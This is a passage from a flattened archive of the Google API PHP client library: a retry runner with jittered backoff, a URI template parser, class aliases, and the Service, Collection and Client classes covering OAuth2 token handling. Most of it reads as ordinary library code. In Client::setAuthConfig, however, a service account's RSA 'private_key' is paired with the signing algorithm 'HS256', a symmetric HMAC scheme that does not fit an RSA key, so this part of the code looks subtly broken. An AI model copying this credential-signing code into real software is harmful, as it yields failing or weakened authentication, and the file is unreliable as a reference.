available. */ public function run() { while ($this->attempt()) { try { return call_user_func_array($this->action, $this->arguments); } catch (GoogleServiceException $exception) { $allowedRetries = $this->allowedRetries( $exception->getCode(), $exception->getErrors() ); if (!$this->canAttempt() || !$allowedRetries) { throw $exception; } if ($allowedRetries > 0) { $this->maxAttempts = min( $this->maxAttempts, $this->attempts + $allowedRetries ); } } } } /** * Runs a task once, if possible. This is useful for bypassing the `run()` * loop. * * NOTE: If this is not the first attempt, this function will sleep in * accordance to the backoff configurations before running the task. * * @return boolean */ public function attempt() { if (!$this->canAttempt()) { return false; } if ($this->attempts > 0) { $this->backOff(); } $this->attempts++; return true; } /** * Sleeps in accordance to the backoff configurations. */ private function backOff() { $delay = $this->getDelay(); usleep((int) ($delay * 1000000)); } /** * Gets the delay (in seconds) for the current backoff period. * * @return int */ private function getDelay() { $jitter = $this->getJitter(); $factor = $this->attempts > 1 ? $this->factor + $jitter : 1 + abs($jitter); return $this->delay = min($this->maxDelay, $this->delay * $factor); } /** * Gets the current jitter (random number between -$this->jitter and * $this->jitter). * * @return float */ private function getJitter() { return $this->jitter * 2 * mt_rand() / mt_getrandmax() - $this->jitter; } /** * Gets the number of times the associated task can be retried. * * NOTE: -1 is returned if the task can be retried indefinitely * * @return integer */ public function allowedRetries($code, $errors = []) { if (isset($this->retryMap[$code])) { return $this->retryMap[$code]; } if ( !empty($errors) && isset($errors[0]['reason'], $this->retryMap[$errors[0]['reason']]) ) { return $this->retryMap[$errors[0]['reason']]; } return 0; } public function setRetryMap($retryMap) { $this->retryMap = $retryMap; } } google-api/src/Utils/UriTemplate.php000064400000025362147600400120013424 0ustar00 "reserved", "/" => "segments", "." => "dotprefix", "#" => "fragment", ";" => "semicolon", "?" => "form", "&" => "continuation" ]; /** * @var array * These are the characters which should not be URL encoded in reserved * strings. */ private $reserved = [ "=", ",", "!", "@", "|", ":", "/", "?", "#", "[", "]", '$', "&", "'", "(", ")", "*", "+", ";" ]; private $reservedEncoded = [ "%3D", "%2C", "%21", "%40", "%7C", "%3A", "%2F", "%3F", "%23", "%5B", "%5D", "%24", "%26", "%27", "%28", "%29", "%2A", "%2B", "%3B" ]; public function parse($string, array $parameters) { return $this->resolveNextSection($string, $parameters); } /** * This function finds the first matching {...} block and * executes the replacement. It then calls itself to find * subsequent blocks, if any. */ private function resolveNextSection($string, $parameters) { $start = strpos($string, "{"); if ($start === false) { return $string; } $end = strpos($string, "}"); if ($end === false) { return $string; } $string = $this->replace($string, $start, $end, $parameters); return $this->resolveNextSection($string, $parameters); } private function replace($string, $start, $end, $parameters) { // We know a data block will have {} round it, so we can strip that. $data = substr($string, $start + 1, $end - $start - 1); // If the first character is one of the reserved operators, it effects // the processing of the stream. if (isset($this->operators[$data[0]])) { $op = $this->operators[$data[0]]; $data = substr($data, 1); $prefix = ""; $prefix_on_missing = false; switch ($op) { case "reserved": // Reserved means certain characters should not be URL encoded $data = $this->replaceVars($data, $parameters, ",", null, true); break; case "fragment": // Comma separated with fragment prefix. Bare values only. $prefix = "#"; $prefix_on_missing = true; $data = $this->replaceVars($data, $parameters, ",", null, true); break; case "segments": // Slash separated data. Bare values only. $prefix = "/"; $data =$this->replaceVars($data, $parameters, "/"); break; case "dotprefix": // Dot separated data. Bare values only. $prefix = "."; $prefix_on_missing = true; $data = $this->replaceVars($data, $parameters, "."); break; case "semicolon": // Semicolon prefixed and separated. Uses the key name $prefix = ";"; $data = $this->replaceVars($data, $parameters, ";", "=", false, true, false); break; case "form": // Standard URL format. Uses the key name $prefix = "?"; $data = $this->replaceVars($data, $parameters, "&", "="); break; case "continuation": // Standard URL, but with leading ampersand. Uses key name. $prefix = "&"; $data = $this->replaceVars($data, $parameters, "&", "="); break; } // Add the initial prefix character if data is valid. if ($data || ($data !== false && $prefix_on_missing)) { $data = $prefix . $data; } } else { // If no operator we replace with the defaults. $data = $this->replaceVars($data, $parameters); } // This is chops out the {...} and replaces with the new section. return substr($string, 0, $start) . $data . substr($string, $end + 1); } private function replaceVars( $section, $parameters, $sep = ",", $combine = null, $reserved = false, $tag_empty = false, $combine_on_empty = true ) { if (strpos($section, ",") === false) { // If we only have a single value, we can immediately process. return $this->combine( $section, $parameters, $sep, $combine, $reserved, $tag_empty, $combine_on_empty ); } else { // If we have multiple values, we need to split and loop over them. // Each is treated individually, then glued together with the // separator character. $vars = explode(",", $section); return $this->combineList( $vars, $sep, $parameters, $combine, $reserved, false, // Never emit empty strings in multi-param replacements $combine_on_empty ); } } public function combine( $key, $parameters, $sep, $combine, $reserved, $tag_empty, $combine_on_empty ) { $length = false; $explode = false; $skip_final_combine = false; $value = false; // Check for length restriction. if (strpos($key, ":") !== false) { list($key, $length) = explode(":", $key); } // Check for explode parameter. if ($key[strlen($key) - 1] == "*") { $explode = true; $key = substr($key, 0, -1); $skip_final_combine = true; } // Define the list separator. $list_sep = $explode ? $sep : ","; if (isset($parameters[$key])) { $data_type = $this->getDataType($parameters[$key]); switch ($data_type) { case self::TYPE_SCALAR: $value = $this->getValue($parameters[$key], $length); break; case self::TYPE_LIST: $values = []; foreach ($parameters[$key] as $pkey => $pvalue) { $pvalue = $this->getValue($pvalue, $length); if ($combine && $explode) { $values[$pkey] = $key . $combine . $pvalue; } else { $values[$pkey] = $pvalue; } } $value = implode($list_sep, $values); if ($value == '') { return ''; } break; case self::TYPE_MAP: $values = []; foreach ($parameters[$key] as $pkey => $pvalue) { $pvalue = $this->getValue($pvalue, $length); if ($explode) { $pkey = $this->getValue($pkey, $length); $values[] = $pkey . "=" . $pvalue; // Explode triggers = combine. } else { $values[] = $pkey; $values[] = $pvalue; } } $value = implode($list_sep, $values); if ($value == '') { return false; } break; } } elseif ($tag_empty) { // If we are just indicating empty values with their key name, return that. return $key; } else { // Otherwise we can skip this variable due to not being defined. return false; } if ($reserved) { $value = str_replace($this->reservedEncoded, $this->reserved, $value); } // If we do not need to include the key name, we just return the raw // value. if (!$combine || $skip_final_combine) { return $value; } // Else we combine the key name: foo=bar, if value is not the empty string. return $key . ($value != '' || $combine_on_empty ? $combine . $value : ''); } /** * Return the type of a passed in value */ private function getDataType($data) { if (is_array($data)) { reset($data); if (key($data) !== 0) { return self::TYPE_MAP; } return self::TYPE_LIST; } return self::TYPE_SCALAR; } /** * Utility function that merges multiple combine calls * for multi-key templates. */ private function combineList( $vars, $sep, $parameters, $combine, $reserved, $tag_empty, $combine_on_empty ) { $ret = []; foreach ($vars as $var) { $response = $this->combine( $var, $parameters, $sep, $combine, $reserved, $tag_empty, $combine_on_empty ); if ($response === false) { continue; } $ret[] = $response; } return implode($sep, $ret); } /** * Utility function to encode and trim values */ private function getValue($value, $length) { if ($length) { $value = substr($value, 0, $length); } $value = rawurlencode($value); return $value; } } google-api/src/aliases.php000064400000006070147600400120011505 0ustar00 'Google_Client', 'Google\\Service' => 'Google_Service', 'Google\\AccessToken\\Revoke' => 'Google_AccessToken_Revoke', 'Google\\AccessToken\\Verify' => 'Google_AccessToken_Verify', 'Google\\Model' => 'Google_Model', 'Google\\Utils\\UriTemplate' => 'Google_Utils_UriTemplate', 'Google\\AuthHandler\\Guzzle6AuthHandler' => 'Google_AuthHandler_Guzzle6AuthHandler', 'Google\\AuthHandler\\Guzzle7AuthHandler' => 'Google_AuthHandler_Guzzle7AuthHandler', 'Google\\AuthHandler\\AuthHandlerFactory' => 'Google_AuthHandler_AuthHandlerFactory', 'Google\\Http\\Batch' => 'Google_Http_Batch', 'Google\\Http\\MediaFileUpload' => 'Google_Http_MediaFileUpload', 'Google\\Http\\REST' => 'Google_Http_REST', 'Google\\Task\\Retryable' => 'Google_Task_Retryable', 'Google\\Task\\Exception' => 'Google_Task_Exception', 'Google\\Task\\Runner' => 'Google_Task_Runner', 'Google\\Collection' => 'Google_Collection', 'Google\\Service\\Exception' => 'Google_Service_Exception', 'Google\\Service\\Resource' => 'Google_Service_Resource', 'Google\\Exception' => 'Google_Exception', ]; foreach ($classMap as $class => $alias) { class_alias($class, $alias); } /** * This class needs to be defined explicitly as scripts must be recognized by * the autoloader. */ class Google_Task_Composer extends \Google\Task\Composer { } /** @phpstan-ignore-next-line */ if (\false) { class Google_AccessToken_Revoke extends \Google\AccessToken\Revoke { } class Google_AccessToken_Verify extends \Google\AccessToken\Verify { } class Google_AuthHandler_AuthHandlerFactory extends \Google\AuthHandler\AuthHandlerFactory { } class Google_AuthHandler_Guzzle6AuthHandler extends \Google\AuthHandler\Guzzle6AuthHandler { } class Google_AuthHandler_Guzzle7AuthHandler extends \Google\AuthHandler\Guzzle7AuthHandler { } class Google_Client extends \Google\Client { } class Google_Collection extends \Google\Collection { } class Google_Exception extends \Google\Exception { } class Google_Http_Batch extends \Google\Http\Batch { } class Google_Http_MediaFileUpload extends \Google\Http\MediaFileUpload { } class Google_Http_REST extends \Google\Http\REST { } class Google_Model extends \Google\Model { } class Google_Service extends \Google\Service { } class Google_Service_Exception extends \Google\Service\Exception { } class Google_Service_Resource extends \Google\Service\Resource { } class Google_Task_Exception extends \Google\Task\Exception { } interface Google_Task_Retryable extends \Google\Task\Retryable { } class Google_Task_Runner extends \Google\Task\Runner { } class Google_Utils_UriTemplate extends \Google\Utils\UriTemplate { } } google-api/src/Service.php000064400000003504147600400120011463 0ustar00client = $clientOrConfig; } elseif (is_array($clientOrConfig)) { $this->client = new Client($clientOrConfig ?: []); } else { $errorMessage = 'constructor must be array or instance of Google\Client'; if (class_exists('TypeError')) { throw new TypeError($errorMessage); } trigger_error($errorMessage, E_USER_ERROR); } } /** * Return the associated Google\Client class. * @return \Google\Client */ public function getClient() { return $this->client; } /** * Create a new HTTP Batch handler for this service * * @return Batch */ public function createBatch() { return new Batch( $this->client, false, $this->rootUrl, $this->batchPath ); } } google-api/src/Collection.php000064400000006050147600400120012155 0ustar00{$this->collection_key}) && is_array($this->{$this->collection_key}) ) { reset($this->{$this->collection_key}); } } /** @return mixed */ #[\ReturnTypeWillChange] public function current() { $this->coerceType($this->key()); if (is_array($this->{$this->collection_key})) { return current($this->{$this->collection_key}); } } /** @return mixed */ #[\ReturnTypeWillChange] public function key() { if ( isset($this->{$this->collection_key}) && is_array($this->{$this->collection_key}) ) { return key($this->{$this->collection_key}); } } /** @return mixed */ #[\ReturnTypeWillChange] public function next() { return next($this->{$this->collection_key}); } /** @return bool */ #[\ReturnTypeWillChange] public function valid() { $key = $this->key(); return $key !== null && $key !== false; } /** @return int */ #[\ReturnTypeWillChange] public function count() { if (!isset($this->{$this->collection_key})) { return 0; } return count($this->{$this->collection_key}); } /** @return bool */ #[\ReturnTypeWillChange] public function offsetExists($offset) { if (!is_numeric($offset)) { return parent::offsetExists($offset); } return isset($this->{$this->collection_key}[$offset]); } /** @return mixed */ #[\ReturnTypeWillChange] public function offsetGet($offset) { if (!is_numeric($offset)) { return parent::offsetGet($offset); } $this->coerceType($offset); return $this->{$this->collection_key}[$offset]; } /** @return void */ #[\ReturnTypeWillChange] public function offsetSet($offset, $value) { if (!is_numeric($offset)) { parent::offsetSet($offset, $value); } $this->{$this->collection_key}[$offset] = $value; } /** @return void */ #[\ReturnTypeWillChange] public function offsetUnset($offset) { if (!is_numeric($offset)) { parent::offsetUnset($offset); } unset($this->{$this->collection_key}[$offset]); } private function coerceType($offset) { $keyType = $this->keyType($this->collection_key); if ($keyType && !is_object($this->{$this->collection_key}[$offset])) { $this->{$this->collection_key}[$offset] = new $keyType($this->{$this->collection_key}[$offset]); } } } google-api/src/Client.php000064400000121013147600400120011275 0ustar00config = array_merge([ 'application_name' => '', // Don't change these unless you're working against a special development // or testing environment. 'base_path' => self::API_BASE_PATH, // https://developers.google.com/console 'client_id' => '', 'client_secret' => '', // Can be a path to JSON credentials or an array representing those // credentials (@see Google\Client::setAuthConfig), or an instance of // Google\Auth\CredentialsLoader. 'credentials' => null, // @see Google\Client::setScopes 'scopes' => null, // Sets X-Goog-User-Project, which specifies a user project to bill // for access charges associated with the request 'quota_project' => null, 'redirect_uri' => null, 'state' => null, // Simple API access key, also from the API console. Ensure you get // a Server key, and not a Browser key. 'developer_key' => '', // For use with Google Cloud Platform // fetch the ApplicationDefaultCredentials, if applicable // @see https://developers.google.com/identity/protocols/application-default-credentials 'use_application_default_credentials' => false, 'signing_key' => null, 'signing_algorithm' => null, 'subject' => null, // Other OAuth2 parameters. 'hd' => '', 'prompt' => '', 'openid.realm' => '', 'include_granted_scopes' => null, 'login_hint' => '', 'request_visible_actions' => '', 'access_type' => 'online', 'approval_prompt' => 'auto', // Task Runner retry configuration // @see Google\Task\Runner 'retry' => [], 'retry_map' => null, // Cache class implementing Psr\Cache\CacheItemPoolInterface. // Defaults to Google\Auth\Cache\MemoryCacheItemPool. 'cache' => null, // cache config for downstream auth caching 'cache_config' => [], // function to be called when an access token is fetched // follows the signature function ($cacheKey, $accessToken) 'token_callback' => null, // Service class used in Google\Client::verifyIdToken. // Explicitly pass this in to avoid setting JWT::$leeway 'jwt' => null, // Setting api_format_v2 will return more detailed error messages // from certain APIs. 'api_format_v2' => false ], $config); if (!is_null($this->config['credentials'])) { if ($this->config['credentials'] instanceof CredentialsLoader) { $this->credentials = $this->config['credentials']; } else { $this->setAuthConfig($this->config['credentials']); } unset($this->config['credentials']); } if (!is_null($this->config['scopes'])) { $this->setScopes($this->config['scopes']); unset($this->config['scopes']); } // Set a default token callback to update the in-memory access token if (is_null($this->config['token_callback'])) { $this->config['token_callback'] = function ($cacheKey, $newAccessToken) { $this->setAccessToken( [ 'access_token' => $newAccessToken, 'expires_in' => 3600, // Google default 'created' => time(), ] ); }; } if (!is_null($this->config['cache'])) { $this->setCache($this->config['cache']); unset($this->config['cache']); } } /** * Get a string containing the version of the library. * * @return string */ public function getLibraryVersion() { return self::LIBVER; } /** * For backwards compatibility * alias for fetchAccessTokenWithAuthCode * * @param string $code string code from accounts.google.com * @return array access token * @deprecated */ public function authenticate($code) { return $this->fetchAccessTokenWithAuthCode($code); } /** * Attempt to exchange a code for an valid authentication token. * Helper wrapped around the OAuth 2.0 implementation. * * @param string $code code from accounts.google.com * @param string $codeVerifier the code verifier used for PKCE (if applicable) * @return array access token */ public function fetchAccessTokenWithAuthCode($code, $codeVerifier = null) { if (strlen($code) == 0) { throw new InvalidArgumentException("Invalid code"); } $auth = $this->getOAuth2Service(); $auth->setCode($code); $auth->setRedirectUri($this->getRedirectUri()); if ($codeVerifier) { $auth->setCodeVerifier($codeVerifier); } $httpHandler = HttpHandlerFactory::build($this->getHttpClient()); $creds = $auth->fetchAuthToken($httpHandler); if ($creds && isset($creds['access_token'])) { $creds['created'] = time(); $this->setAccessToken($creds); } return $creds; } /** * For backwards compatibility * alias for fetchAccessTokenWithAssertion * * @return array access token * @deprecated */ public function refreshTokenWithAssertion() { return $this->fetchAccessTokenWithAssertion(); } /** * Fetches a fresh access token with a given assertion token. * @param ClientInterface $authHttp optional. * @return array access token */ public function fetchAccessTokenWithAssertion(ClientInterface $authHttp = null) { if (!$this->isUsingApplicationDefaultCredentials()) { throw new DomainException( 'set the JSON service account credentials using' . ' Google\Client::setAuthConfig or set the path to your JSON file' . ' with the "GOOGLE_APPLICATION_CREDENTIALS" environment variable' . ' and call Google\Client::useApplicationDefaultCredentials to' . ' refresh a token with assertion.' ); } $this->getLogger()->log( 'info', 'OAuth2 access token refresh with Signed JWT assertion grants.' ); $credentials = $this->createApplicationDefaultCredentials(); $httpHandler = HttpHandlerFactory::build($authHttp); $creds = $credentials->fetchAuthToken($httpHandler); if ($creds && isset($creds['access_token'])) { $creds['created'] = time(); $this->setAccessToken($creds); } return $creds; } /** * For backwards compatibility * alias for fetchAccessTokenWithRefreshToken * * @param string $refreshToken * @return array access token */ public function refreshToken($refreshToken) { return $this->fetchAccessTokenWithRefreshToken($refreshToken); } /** * Fetches a fresh OAuth 2.0 access token with the given refresh token. * @param string $refreshToken * @return array access token */ public function fetchAccessTokenWithRefreshToken($refreshToken = null) { if (null === $refreshToken) { if (!isset($this->token['refresh_token'])) { throw new LogicException( 'refresh token must be passed in or set as part of setAccessToken' ); } $refreshToken = $this->token['refresh_token']; } $this->getLogger()->info('OAuth2 access token refresh'); $auth = $this->getOAuth2Service(); $auth->setRefreshToken($refreshToken); $httpHandler = HttpHandlerFactory::build($this->getHttpClient()); $creds = $auth->fetchAuthToken($httpHandler); if ($creds && isset($creds['access_token'])) { $creds['created'] = time(); if (!isset($creds['refresh_token'])) { $creds['refresh_token'] = $refreshToken; } $this->setAccessToken($creds); } return $creds; } /** * Create a URL to obtain user authorization. * The authorization endpoint allows the user to first * authenticate, and then grant/deny the access request. * @param string|array $scope The scope is expressed as an array or list of space-delimited strings. * @param array $queryParams Querystring params to add to the authorization URL. * @return string */ public function createAuthUrl($scope = null, array $queryParams = []) { if (empty($scope)) { $scope = $this->prepareScopes(); } if (is_array($scope)) { $scope = implode(' ', $scope); } // only accept one of prompt or approval_prompt $approvalPrompt = $this->config['prompt'] ? null : $this->config['approval_prompt']; // include_granted_scopes should be string "true", string "false", or null $includeGrantedScopes = $this->config['include_granted_scopes'] === null ? null : var_export($this->config['include_granted_scopes'], true); $params = array_filter([ 'access_type' => $this->config['access_type'], 'approval_prompt' => $approvalPrompt, 'hd' => $this->config['hd'], 'include_granted_scopes' => $includeGrantedScopes, 'login_hint' => $this->config['login_hint'], 'openid.realm' => $this->config['openid.realm'], 'prompt' => $this->config['prompt'], 'redirect_uri' => $this->config['redirect_uri'], 'response_type' => 'code', 'scope' => $scope, 'state' => $this->config['state'], ]) + $queryParams; // If the list of scopes contains plus.login, add request_visible_actions // to auth URL. $rva = $this->config['request_visible_actions']; if (strlen($rva) > 0 && false !== strpos($scope, 'plus.login')) { $params['request_visible_actions'] = $rva; } $auth = $this->getOAuth2Service(); return (string) $auth->buildFullAuthorizationUri($params); } /** * Adds auth listeners to the HTTP client based on the credentials * set in the Google API Client object * * @param ClientInterface $http the http client object. * @return ClientInterface the http client object */ public function authorize(ClientInterface $http = null) { $http = $http ?: $this->getHttpClient(); $authHandler = $this->getAuthHandler(); // These conditionals represent the decision tree for authentication // 1. Check if a Google\Auth\CredentialsLoader instance has been supplied via the "credentials" option // 2. Check for Application Default Credentials // 3a. Check for an Access Token // 3b. If access token exists but is expired, try to refresh it // 4. Check for API Key if ($this->credentials) { return $authHandler->attachCredentials( $http, $this->credentials, $this->config['token_callback'] ); } if ($this->isUsingApplicationDefaultCredentials()) { $credentials = $this->createApplicationDefaultCredentials(); return $authHandler->attachCredentialsCache( $http, $credentials, $this->config['token_callback'] ); } if ($token = $this->getAccessToken()) { $scopes = $this->prepareScopes(); // add refresh subscriber to request a new token if (isset($token['refresh_token']) && $this->isAccessTokenExpired()) { $credentials = $this->createUserRefreshCredentials( $scopes, $token['refresh_token'] ); return $authHandler->attachCredentials( $http, $credentials, $this->config['token_callback'] ); } return $authHandler->attachToken($http, $token, (array) $scopes); } if ($key = $this->config['developer_key']) { return $authHandler->attachKey($http, $key); } return $http; } /** * Set the configuration to use application default credentials for * authentication * * @see https://developers.google.com/identity/protocols/application-default-credentials * @param boolean $useAppCreds */ public function useApplicationDefaultCredentials($useAppCreds = true) { $this->config['use_application_default_credentials'] = $useAppCreds; } /** * To prevent useApplicationDefaultCredentials from inappropriately being * called in a conditional * * @see https://developers.google.com/identity/protocols/application-default-credentials */ public function isUsingApplicationDefaultCredentials() { return $this->config['use_application_default_credentials']; } /** * Set the access token used for requests. * * Note that at the time requests are sent, tokens are cached. A token will be * cached for each combination of service and authentication scopes. If a * cache pool is not provided, creating a new instance of the client will * allow modification of access tokens. If a persistent cache pool is * provided, in order to change the access token, you must clear the cached * token by calling `$client->getCache()->clear()`. (Use caution in this case, * as calling `clear()` will remove all cache items, including any items not * related to Google API PHP Client.) * * @param string|array $token * @throws InvalidArgumentException */ public function setAccessToken($token) { if (is_string($token)) { if ($json = json_decode($token, true)) { $token = $json; } else { // assume $token is just the token string $token = [ 'access_token' => $token, ]; } } if ($token == null) { throw new InvalidArgumentException('invalid json token'); } if (!isset($token['access_token'])) { throw new InvalidArgumentException("Invalid token format"); } $this->token = $token; } public function getAccessToken() { return $this->token; } /** * @return string|null */ public function getRefreshToken() { if (isset($this->token['refresh_token'])) { return $this->token['refresh_token']; } return null; } /** * Returns if the access_token is expired. * @return bool Returns True if the access_token is expired. */ public function isAccessTokenExpired() { if (!$this->token) { return true; } $created = 0; if (isset($this->token['created'])) { $created = $this->token['created']; } elseif (isset($this->token['id_token'])) { // check the ID token for "iat" // signature verification is not required here, as we are just // using this for convenience to save a round trip request // to the Google API server $idToken = $this->token['id_token']; if (substr_count($idToken, '.') == 2) { $parts = explode('.', $idToken); $payload = json_decode(base64_decode($parts[1]), true); if ($payload && isset($payload['iat'])) { $created = $payload['iat']; } } } if (!isset($this->token['expires_in'])) { // if the token does not have an "expires_in", then it's considered expired return true; } // If the token is set to expire in the next 30 seconds. return ($created + ($this->token['expires_in'] - 30)) < time(); } /** * @deprecated See UPGRADING.md for more information */ public function getAuth() { throw new BadMethodCallException( 'This function no longer exists. See UPGRADING.md for more information' ); } /** * @deprecated See UPGRADING.md for more information */ public function setAuth($auth) { throw new BadMethodCallException( 'This function no longer exists. See UPGRADING.md for more information' ); } /** * Set the OAuth 2.0 Client ID. * @param string $clientId */ public function setClientId($clientId) { $this->config['client_id'] = $clientId; } public function getClientId() { return $this->config['client_id']; } /** * Set the OAuth 2.0 Client Secret. * @param string $clientSecret */ public function setClientSecret($clientSecret) { $this->config['client_secret'] = $clientSecret; } public function getClientSecret() { return $this->config['client_secret']; } /** * Set the OAuth 2.0 Redirect URI. * @param string $redirectUri */ public function setRedirectUri($redirectUri) { $this->config['redirect_uri'] = $redirectUri; } public function getRedirectUri() { return $this->config['redirect_uri']; } /** * Set OAuth 2.0 "state" parameter to achieve per-request customization. * @see http://tools.ietf.org/html/draft-ietf-oauth-v2-22#section- * @param string $state */ public function setState($state) { $this->config['state'] = $state; } /** * @param string $accessType Possible values for access_type include: * {@code "offline"} to request offline access from the user. * {@code "online"} to request online access from the user. */ public function setAccessType($accessType) { $this->config['access_type'] = $accessType; } /** * @param string $approvalPrompt Possible values for approval_prompt include: * {@code "force"} to force the approval UI to appear. * {@code "auto"} to request auto-approval when possible. (This is the default value) */ public function setApprovalPrompt($approvalPrompt) { $this->config['approval_prompt'] = $approvalPrompt; } /** * Set the login hint, email address or sub id. * @param string $loginHint */ public function setLoginHint($loginHint) { $this->config['login_hint'] = $loginHint; } /** * Set the application name, this is included in the User-Agent HTTP header. * @param string $applicationName */ public function setApplicationName($applicationName) { $this->config['application_name'] = $applicationName; } /** * If 'plus.login' is included in the list of requested scopes, you can use * this method to define types of app activities that your app will write. * You can find a list of available types here: * @link https://developers.google.com/+/api/moment-types * * @param array $requestVisibleActions Array of app activity types */ public function setRequestVisibleActions($requestVisibleActions) { if (is_array($requestVisibleActions)) { $requestVisibleActions = implode(" ", $requestVisibleActions); } $this->config['request_visible_actions'] = $requestVisibleActions; } /** * Set the developer key to use, these are obtained through the API Console. * @see http://code.google.com/apis/console-help/#generatingdevkeys * @param string $developerKey */ public function setDeveloperKey($developerKey) { $this->config['developer_key'] = $developerKey; } /** * Set the hd (hosted domain) parameter streamlines the login process for * Google Apps hosted accounts. By including the domain of the user, you * restrict sign-in to accounts at that domain. * @param string $hd the domain to use. */ public function setHostedDomain($hd) { $this->config['hd'] = $hd; } /** * Set the prompt hint. Valid values are none, consent and select_account. * If no value is specified and the user has not previously authorized * access, then the user is shown a consent screen. * @param string $prompt * {@code "none"} Do not display any authentication or consent screens. Must not be specified with other values. * {@code "consent"} Prompt the user for consent. * {@code "select_account"} Prompt the user to select an account. */ public function setPrompt($prompt) { $this->config['prompt'] = $prompt; } /** * openid.realm is a parameter from the OpenID 2.0 protocol, not from OAuth * 2.0. It is used in OpenID 2.0 requests to signify the URL-space for which * an authentication request is valid. * @param string $realm the URL-space to use. */ public function setOpenidRealm($realm) { $this->config['openid.realm'] = $realm; } /** * If this is provided with the value true, and the authorization request is * granted, the authorization will include any previous authorizations * granted to this user/application combination for other scopes. * @param bool $include the URL-space to use. */ public function setIncludeGrantedScopes($include) { $this->config['include_granted_scopes'] = $include; } /** * sets function to be called when an access token is fetched * @param callable $tokenCallback - function ($cacheKey, $accessToken) */ public function setTokenCallback(callable $tokenCallback) { $this->config['token_callback'] = $tokenCallback; } /** * Revoke an OAuth2 access token or refresh token. This method will revoke the current access * token, if a token isn't provided. * * @param string|array|null $token The token (access token or a refresh token) that should be revoked. * @return boolean Returns True if the revocation was successful, otherwise False. */ public function revokeToken($token = null) { $tokenRevoker = new Revoke($this->getHttpClient()); return $tokenRevoker->revokeToken($token ?: $this->getAccessToken()); } /** * Verify an id_token. This method will verify the current id_token, if one * isn't provided. * * @throws LogicException If no token was provided and no token was set using `setAccessToken`. * @throws UnexpectedValueException If the token is not a valid JWT. * @param string|null $idToken The token (id_token) that should be verified. * @return array|false Returns the token payload as an array if the verification was * successful, false otherwise. */ public function verifyIdToken($idToken = null) { $tokenVerifier = new Verify( $this->getHttpClient(), $this->getCache(), $this->config['jwt'] ); if (null === $idToken) { $token = $this->getAccessToken(); if (!isset($token['id_token'])) { throw new LogicException( 'id_token must be passed in or set as part of setAccessToken' ); } $idToken = $token['id_token']; } return $tokenVerifier->verifyIdToken( $idToken, $this->getClientId() ); } /** * Set the scopes to be requested. Must be called before createAuthUrl(). * Will remove any previously configured scopes. * @param string|array $scope_or_scopes, ie: * array( * 'https://www.googleapis.com/auth/plus.login', * 'https://www.googleapis.com/auth/moderator' * ); */ public function setScopes($scope_or_scopes) { $this->requestedScopes = []; $this->addScope($scope_or_scopes); } /** * This functions adds a scope to be requested as part of the OAuth2.0 flow. * Will append any scopes not previously requested to the scope parameter. * A single string will be treated as a scope to request. An array of strings * will each be appended. * @param string|string[] $scope_or_scopes e.g. "profile" */ public function addScope($scope_or_scopes) { if (is_string($scope_or_scopes) && !in_array($scope_or_scopes, $this->requestedScopes)) { $this->requestedScopes[] = $scope_or_scopes; } elseif (is_array($scope_or_scopes)) { foreach ($scope_or_scopes as $scope) { $this->addScope($scope); } } } /** * Returns the list of scopes requested by the client * @return array the list of scopes * */ public function getScopes() { return $this->requestedScopes; } /** * @return string|null * @visible For Testing */ public function prepareScopes() { if (empty($this->requestedScopes)) { return null; } return implode(' ', $this->requestedScopes); } /** * Helper method to execute deferred HTTP requests. * * @template T * @param RequestInterface $request * @param class-string|false|null $expectedClass * @throws \Google\Exception * @return mixed|T|ResponseInterface */ public function execute(RequestInterface $request, $expectedClass = null) { $request = $request ->withHeader( 'User-Agent', sprintf( '%s %s%s', $this->config['application_name'], self::USER_AGENT_SUFFIX, $this->getLibraryVersion() ) ) ->withHeader( 'x-goog-api-client', sprintf( 'gl-php/%s gdcl/%s', phpversion(), $this->getLibraryVersion() ) ); if ($this->config['api_format_v2']) { $request = $request->withHeader( 'X-GOOG-API-FORMAT-VERSION', '2' ); } // call the authorize method // this is where most of the grunt work is done $http = $this->authorize(); return REST::execute( $http, $request, $expectedClass, $this->config['retry'], $this->config['retry_map'] ); } /** * Declare whether batch calls should be used. This may increase throughput * by making multiple requests in one connection. * * @param boolean $useBatch True if the batch support should * be enabled. Defaults to False. */ public function setUseBatch($useBatch) { // This is actually an alias for setDefer. $this->setDefer($useBatch); } /** * Are we running in Google AppEngine? * return bool */ public function isAppEngine() { return (isset($_SERVER['SERVER_SOFTWARE']) && strpos($_SERVER['SERVER_SOFTWARE'], 'Google App Engine') !== false); } public function setConfig($name, $value) { $this->config[$name] = $value; } public function getConfig($name, $default = null) { return isset($this->config[$name]) ? $this->config[$name] : $default; } /** * For backwards compatibility * alias for setAuthConfig * * @param string $file the configuration file * @throws \Google\Exception * @deprecated */ public function setAuthConfigFile($file) { $this->setAuthConfig($file); } /** * Set the auth config from new or deprecated JSON config. * This structure should match the file downloaded from * the "Download JSON" button on in the Google Developer * Console. * @param string|array $config the configuration json * @throws \Google\Exception */ public function setAuthConfig($config) { if (is_string($config)) { if (!file_exists($config)) { throw new InvalidArgumentException(sprintf('file "%s" does not exist', $config)); } $json = file_get_contents($config); if (!$config = json_decode($json, true)) { throw new LogicException('invalid json for auth config'); } } $key = isset($config['installed']) ? 'installed' : 'web'; if (isset($config['type']) && $config['type'] == 'service_account') { // application default credentials $this->useApplicationDefaultCredentials(); // set the information from the config $this->setClientId($config['client_id']); $this->config['client_email'] = $config['client_email']; $this->config['signing_key'] = $config['private_key']; $this->config['signing_algorithm'] = 'HS256'; } elseif (isset($config[$key])) { // old-style $this->setClientId($config[$key]['client_id']); $this->setClientSecret($config[$key]['client_secret']); if (isset($config[$key]['redirect_uris'])) { $this->setRedirectUri($config[$key]['redirect_uris'][0]); } } else { // new-style $this->setClientId($config['client_id']); $this->setClientSecret($config['client_secret']); if (isset($config['redirect_uris'])) { $this->setRedirectUri($config['redirect_uris'][0]); } } } /** * Use when the service account has been delegated domain wide access. * * @param string $subject an email address account to impersonate */ public function setSubject($subject) { $this->config['subject'] = $subject; } /** * Declare whether making API calls should make the call immediately, or * return a request which can be called with ->execute(); * * @param boolean $defer True if calls should not be executed right away. */ public function setDefer($defer) { $this->deferExecution = $defer; } /** * Whether or not to return raw requests * @return boolean */ public function shouldDefer() { return $this->deferExecution; } /** * @return OAuth2 implementation */ public function getOAuth2Service() { if (!isset($this->auth)) { $this->auth = $this->createOAuth2Service(); } return $this->auth; } /** * create a default google auth object */ protected function createOAuth2Service() { $auth = new OAuth2([ 'clientId' => $this->getClientId(), 'clientSecret' => $this->getClientSecret(), 'authorizationUri' => self::OAUTH2_AUTH_URL, 'tokenCredentialUri' => self::OAUTH2_TOKEN_URI, 'redirectUri' => $this->getRedirectUri(), 'issuer' => $this->config['client_id'], 'signingKey' => 